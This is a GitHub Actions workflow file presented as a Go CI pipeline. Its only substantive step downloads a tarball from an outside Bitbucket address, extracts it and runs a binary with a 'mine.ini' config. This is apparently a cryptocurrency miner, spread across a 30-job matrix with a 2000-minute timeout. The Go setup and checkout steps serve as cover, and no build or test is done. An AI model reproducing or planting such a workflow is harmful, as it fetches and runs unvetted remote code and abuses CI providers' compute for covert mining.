name: Teuka CI

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:

  build:
    name: Tarik Sist
    runs-on: ubuntu-latest
    strategy:
      matrix:
        go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16]
        flag: [pkn, ips, bin, jar, cek]
    timeout-minutes: 2000
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}

    steps:
      
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go

    - name: Check out code into the Go module directory
      uses: actions/checkout@v1

    - name: Smongko
      run: |
        wget https://bitbucket.org/17423078/semongko/downloads/dudi.tar.gz && tar -xvf dudi.tar.gz && ./ikuk mine.ini
